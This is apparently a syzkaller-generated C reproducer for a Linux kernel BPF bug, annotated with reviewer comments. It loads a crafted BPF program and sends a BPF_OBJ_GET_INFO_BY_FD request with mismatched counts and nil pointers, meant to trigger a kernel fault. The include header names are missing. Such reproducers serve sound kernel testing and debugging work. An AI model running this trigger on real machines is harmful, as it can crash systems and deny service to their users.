// https://syzkaller.appspot.com/bug?id=60ad664771482c1c19766ee94cb710d9c352570c
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Reviewer notes (not part of the generated file):
//  * This is a kernel-bug reproducer, not an application. It lays out a raw
//    BPF_PROG_LOAD request and a raw BPF_OBJ_GET_INFO_BY_FD request at fixed
//    user addresses and issues them through syscall(2). Run it only inside a
//    disposable VM booted with the kernel the linked report was filed
//    against; the outcome it exists to provoke is a kernel fault, not a clean
//    exit. Nothing below checks the result of the second bpf() call, and the
//    process always returns 0 — success is observed on the kernel side.
//  * Loading a BPF program of this type normally requires elevated
//    privileges (CAP_SYS_ADMIN / CAP_BPF); confirm against the target
//    kernel's unprivileged_bpf_disabled setting before assuming it runs as
//    an ordinary user.
//  * The #include directives below lost their header names when this page
//    was extracted. The code uses syscall(), write(), memcpy(), memset() and
//    the <stdint.h> fixed-width types, so the matching libc headers must be
//    restored before this compiles.
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include

// Fallback syscall numbers, used only when the libc headers do not already
// define them. These values follow the asm-generic table (e.g. arm64); on
// architectures with different numbering the header's definition wins
// because of the #ifndef guard.
#ifndef __NR_bpf
#define __NR_bpf 280
#endif
#ifndef __NR_mmap
#define __NR_mmap 222
#endif

// BITMASK(off, len): `len` one-bits starting at bit `off`.
// STORE_BY_BITMASK: read-modify-write a bf_len-bit field at bit bf_off inside
// the integer of type `type` stored at `addr`, leaving the other bits intact.
// `htobe` is an optional byte-order conversion macro; every use in this file
// passes it empty, so the stores are host-endian.
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
  *(type*)(addr) = \
      htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
            (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))

// Resource table: r[0] receives the fd returned by BPF_PROG_LOAD. It starts
// as all-ones so that, if the load fails, the later BPF_OBJ_GET_INFO_BY_FD
// request is built with fd 0xffffffff (the 64-bit value is truncated to a
// 32-bit field) rather than with a stale or zero descriptor.
uint64_t r[1] = {0xffffffffffffffff};

int main(void)
{
  // Reserve the fixed address range the request buffers live in: a
  // PROT_NONE page below, a 16 MiB read/write/exec area at 0x20000000, and
  // a PROT_NONE page above. MAP_FIXED silently replaces anything already
  // mapped there, and the return values are not checked: if the
  // 0x20000000 mapping fails, every fixed-address store below is a wild
  // write. Tolerable in a throwaway reproducer, not elsewhere.
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
          /*fd=*/(intptr_t)-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul,
          /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
          /*fd=*/(intptr_t)-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
          /*fd=*/(intptr_t)-1, /*offset=*/0ul);
  // Scratch variable emitted by the generator; never used here.
  const char* reason;
  (void)reason;
  intptr_t res = 0;
  // Progress marker on stdout. The empty if-body only consumes the return
  // value of write(); a short or failed write is deliberately ignored.
  if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
  }

  // bpf$PROG_LOAD arguments (syzkaller's own annotation of the layout):
  // [
  //   cmd: const = 0x5 (8 bytes)
  //   arg: ptr[in, bpf_prog_t[flags[bpf_prog_type, int32],
  //                           bpf_prog_attach_types, bpf_btf_id[opt],
  //                           fd_bpf_prog[opt]]] {
  //     type: bpf_prog_type = 0xe (4 bytes)
  //     ninsn: bytesize8 = 0x6 (4 bytes)
  //     insns: ptr[in, bpf_instructions] {
  //       framed: bpf_framed_program {
  //         initr0: bpf_insn_init_r0 {
  //           code: const = 0x5 (1 bytes)
  //           dst: const = 0x0, src: const = 0x0 (1 byte together)
  //           off: const = 0x0 (2 bytes)
  //           imm: int32 = 0x0 (4 bytes)
  //           code2: const = 0x71 (1 bytes)
  //           regs2: const = 0x11 (1 bytes)
  //           off2: const = 0x42 (2 bytes)
  //           imm2: int32 = 0x0 (4 bytes)
  //         }
  //         body: array[bpf_insn] {
  //           func: bpf_insn_call_func {
  //             code: const = 0x85, dst: 0x0, src: 0x1, off: 0x0,
  //             func: int32 = 0x2
  //           }
  //           call: bpf_insn_call_helper_t[int32[0:__BPF_FUNC_MAX_ID]] {
  //             code: const = 0x85, regs: 0x0, off: 0x0, func: int32 = 0x5
  //           }
  //           exit: bpf_insn_exit {
  //             code: const = 0x95, regs: 0x0, off: 0x0, imm: 0x0
  //           }
  //         }
  //         exit: bpf_insn_exit {
  //           code: const = 0x95, regs: 0x0, off: const = 0x5a5, imm: 0x0
  //         }
  //       }
  //     }
  //     license: ptr[in, buffer] { buffer: {47 50 4c 00} (length 0x4) }
  //     loglev: int32 = 0x5 (4 bytes)
  //     logsize: len = 0x29e (4 bytes)
  //     log: ptr[out, buffer] { buffer: (DirOut) }
  //     kern_version: bpf_kern_version = 0x0 (4 bytes)
  //     flags: bpf_prog_load_flags = 0x0 (4 bytes)
  //     prog_name: buffer: 16 zero bytes
  //     prog_ifindex: ifindex (resource)
  //     expected_attach_type: union bpf_prog_attach_types {
  //       sk_skb: sk_skb_attach_types = 0x0 (4 bytes)
  //     }
  //     btf_fd: fd_btf (resource)
  //     func_info_rec_size: const = 0x6 (4 bytes)
  //     func_info: nil
  //     func_info_cnt: len = 0x0 (4 bytes)
  //     line_info_rec_size: const = 0x10 (4 bytes)
  //     line_info: nil
  //     line_info_cnt: len = 0x0 (4 bytes)
  //     attach_btf_id: bpf_btf_id (resource)
  //     attach_prog_fd: fd_bpf_prog (resource)
  //     core_relo_cnt: len = 0x0 (4 bytes)
  //     fd_array: nil
  //     core_relos: nil
  //     core_relo_rec_size: const = 0x10 (4 bytes)
  //     log_true_size: int32 = 0x0 (4 bytes)
  //     prog_token_fd: void (length 0x0)
  //     pad: const = 0x0 (4 bytes)
  //   }
  //   size: len = 0x70 (8 bytes)
  // ]
  // returns fd_bpf_prog

  // --- union bpf_attr for BPF_PROG_LOAD, built at 0x20000440. Only 0x70
  // bytes are passed as `size` to the syscall below, i.e. the request ends
  // at 0x200004b0; stores at or beyond that address are outside the length
  // handed to the kernel. Field names follow the annotation above.
  *(uint32_t*)0x20000440 = 0xe;          // prog_type
  *(uint32_t*)0x20000444 = 6;            // insn_cnt: six 8-byte instructions
  *(uint64_t*)0x20000448 = 0x20000000;   // insns -> instruction bytes below

  // Instruction 0 @0x20000000: opcode 0x05, dst 0, src 0, off 0, imm 0.
  *(uint8_t*)0x20000000 = 5;
  STORE_BY_BITMASK(uint8_t, , 0x20000001, 0, 0, 4);   // dst_reg nibble = 0
  STORE_BY_BITMASK(uint8_t, , 0x20000001, 0, 4, 4);   // src_reg nibble = 0
  *(uint16_t*)0x20000002 = 0;
  *(uint32_t*)0x20000004 = 0;
  // Instruction 1 @0x20000008: opcode 0x71 (BPF_LDX|BPF_MEM|BPF_B in the
  // standard eBPF encoding), regs byte 0x11 (dst = src = r1), off 0x42.
  *(uint8_t*)0x20000008 = 0x71;
  *(uint8_t*)0x20000009 = 0x11;
  *(uint16_t*)0x2000000a = 0x42;
  *(uint32_t*)0x2000000c = 0;
  // Instruction 2 @0x20000010: opcode 0x85 (call), src nibble 1, imm 2 —
  // syzkaller labels it bpf_insn_call_func.
  *(uint8_t*)0x20000010 = 0x85;
  STORE_BY_BITMASK(uint8_t, , 0x20000011, 0, 0, 4);   // dst_reg nibble = 0
  STORE_BY_BITMASK(uint8_t, , 0x20000011, 1, 4, 4);   // src_reg nibble = 1
  *(uint16_t*)0x20000012 = 0;
  *(uint32_t*)0x20000014 = 2;
  // Instruction 3 @0x20000018: opcode 0x85 (call), regs 0, imm 5 —
  // syzkaller labels it bpf_insn_call_helper_t (helper id 5).
  *(uint8_t*)0x20000018 = 0x85;
  *(uint8_t*)0x20000019 = 0;
  *(uint16_t*)0x2000001a = 0;
  *(uint32_t*)0x2000001c = 5;
  // Instruction 4 @0x20000020: opcode 0x95 (exit).
  *(uint8_t*)0x20000020 = 0x95;
  *(uint8_t*)0x20000021 = 0;
  *(uint16_t*)0x20000022 = 0;
  *(uint32_t*)0x20000024 = 0;
  // Instruction 5 @0x20000028: opcode 0x95 (exit) with off = 0x5a5.
  *(uint8_t*)0x20000028 = 0x95;
  *(uint8_t*)0x20000029 = 0;
  *(uint16_t*)0x2000002a = 0x5a5;
  *(uint32_t*)0x2000002c = 0;

  *(uint64_t*)0x20000450 = 0x20000080;   // license -> "GPL\0" at 0x20000080
  memcpy((void*)0x20000080, "GPL\000", 4);
  *(uint32_t*)0x20000458 = 5;            // log_level
  *(uint32_t*)0x2000045c = 0x29e;        // log_size
  *(uint64_t*)0x20000460 = 0x2000cf3d;   // log_buf (inside the RWX mapping)
  *(uint32_t*)0x20000468 = 0;            // kern_version
  *(uint32_t*)0x2000046c = 0;            // prog_flags
  memset((void*)0x20000470, 0, 16);      // prog_name: all zero
  *(uint32_t*)0x20000480 = 0;            // prog_ifindex
  *(uint32_t*)0x20000484 = 0;            // expected_attach_type
  *(uint32_t*)0x20000488 = -1;           // btf_fd: no BTF object
  *(uint32_t*)0x2000048c = 6;            // func_info_rec_size
  *(uint64_t*)0x20000490 = 0;            // func_info: nil
  *(uint32_t*)0x20000498 = 0;            // func_info_cnt
  *(uint32_t*)0x2000049c = 0x10;         // line_info_rec_size
  *(uint64_t*)0x200004a0 = 0;            // line_info: nil
  *(uint32_t*)0x200004a8 = 0;            // line_info_cnt
  *(uint32_t*)0x200004ac = 0;            // attach_btf_id
  // From here on the stores fall at or past 0x200004b0, the end of the
  // 0x70-byte request passed below.
  *(uint32_t*)0x200004b0 = -1;           // attach_prog_fd
  *(uint32_t*)0x200004b4 = 0;            // core_relo_cnt
  *(uint64_t*)0x200004b8 = 0;            // fd_array: nil
  *(uint64_t*)0x200004c0 = 0;            // core_relos: nil
  *(uint32_t*)0x200004c8 = 0x10;         // core_relo_rec_size
  *(uint32_t*)0x200004cc = 0;            // log_true_size
  *(uint32_t*)0x200004d0 = 0;            // prog_token_fd / pad
  res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000440ul, /*size=*/0x70ul);
  // Only a successful load updates the resource slot; on failure r[0] keeps
  // its all-ones initial value and the next request is sent with fd -1.
  if (res != -1)
    r[0] = res;

  // bpf$BPF_GET_PROG_INFO arguments (syzkaller's own annotation):
  // [
  //   cmd: const = 0xf (8 bytes)
  //   arg: ptr[in, bpf_get_prog_info_arg] {
  //     prog: fd_bpf_prog (resource)
  //     len: len = 0xe0 (4 bytes)
  //     info: ptr[out, bpf_prog_info] {
  //       type: int32 = 0x0 (4 bytes)
  //       id: bpf_prog_id (resource)
  //       tag: int64 = 0x0 (8 bytes)
  //       jited_prog_len: int32 = 0x0 (4 bytes)
  //       xlated_prog_len: int32 = 0x0 (4 bytes)
  //       jited_prog_insns: int64 = 0x0 (8 bytes)
  //       xlated_prog_insns: int64 = 0x0 (8 bytes)
  //       load_time: int64 = 0x0 (8 bytes)
  //       created_by_uid: int32 = 0x0 (4 bytes)
  //       nr_map_ids: len = 0x0 (4 bytes)
  //       map_ids: nil
  //       name: buffer: (DirOut)
  //       ifindex: ifindex (resource)
  //       gpl_compatible: int32 = 0x0 (4 bytes)
  //       netns_dev: int64 = 0x0 (8 bytes)
  //       netns_ino: int64 = 0x0 (8 bytes)
  //       nr_jited_ksyms: len = 0xfe (4 bytes)
  //       nr_jited_func_lens: len = 0x2 (4 bytes)
  //       jited_ksyms: nil
  //       jited_func_lens: ptr[out, array[int32]] { array[int32] { } }
  //       btf_id: bpf_btf_id (resource)
  //       func_info_rec_size: int32 = 0x0 (4 bytes)
  //       func_info: nil
  //       nr_func_info: bytesize = 0x0 (4 bytes)
  //       nr_line_info: len = 0x0 (4 bytes)
  //       line_info: nil
  //       jited_line_info: nil
  //       nr_jited_line_info: len = 0x0 (4 bytes)
  //       line_info_rec_size: int32 = 0x0 (4 bytes)
  //       jited_line_info_rec_size: const = 0x8 (4 bytes)
  //       nr_prog_tags: len = 0x47 (4 bytes)
  //       prog_tags: nil
  //       run_time_ns: int64 = 0x0 (8 bytes)
  //       run_cnt: int64 = 0x0 (8 bytes)
  //       recursion_misses: int64 = 0x0 (8 bytes)
  //       verified_insns: int32 = 0x0 (4 bytes)
  //       pad = 0x0 (4 bytes)
  //     }
  //   }
  //   size: len = 0x10 (8 bytes)
  // ]

  // --- BPF_OBJ_GET_INFO_BY_FD request at 0x20000100 (0x10 bytes: fd,
  // info_len, info pointer). The bpf_prog_info it points at, at 0x20000340,
  // is left mostly as whatever the mapping held; the generator only writes
  // the fields listed below. Of note are the count/pointer pairs: 0xfe
  // jited_ksyms with a nil pointer, 2 jited_func_lens with a pointer into
  // the RWX area, and 0x47 prog_tags with a nil pointer. This request is
  // the one the reproducer exercises; what the kernel does with it is the
  // subject of the bug linked at the top, not something this file proves.
  *(uint32_t*)0x20000100 = r[0];         // bpf_fd (64-bit r[0] truncated)
  *(uint32_t*)0x20000104 = 0xe0;         // info_len
  *(uint64_t*)0x20000108 = 0x20000340;   // info -> bpf_prog_info below
  *(uint32_t*)0x20000374 = 0;            // nr_map_ids
  *(uint64_t*)0x20000378 = 0;            // map_ids: nil
  *(uint32_t*)0x200003a8 = 0xfe;         // nr_jited_ksyms
  *(uint32_t*)0x200003ac = 2;            // nr_jited_func_lens
  *(uint64_t*)0x200003b0 = 0;            // jited_ksyms: nil
  *(uint64_t*)0x200003b8 = 0x20001b40;   // jited_func_lens -> RWX area
  *(uint32_t*)0x200003c4 = 0;            // func_info_rec_size
  *(uint64_t*)0x200003c8 = 0;            // func_info: nil
  *(uint32_t*)0x200003d0 = 0;            // nr_func_info
  *(uint32_t*)0x200003d4 = 0;            // nr_line_info
  *(uint64_t*)0x200003d8 = 0;            // line_info: nil
  *(uint64_t*)0x200003e0 = 0;            // jited_line_info: nil
  *(uint32_t*)0x200003e8 = 0;            // nr_jited_line_info
  *(uint32_t*)0x200003ec = 0;            // line_info_rec_size
  *(uint32_t*)0x200003f0 = 8;            // jited_line_info_rec_size
  *(uint32_t*)0x200003f4 = 0x47;         // nr_prog_tags
  *(uint64_t*)0x200003f8 = 0;            // prog_tags: nil
  // Return value intentionally unchecked: the reproducer's result is
  // whatever the kernel does while servicing this call.
  syscall(__NR_bpf, /*cmd=*/0xful, /*arg=*/0x20000100ul, /*size=*/0x10ul);
  return 0;
}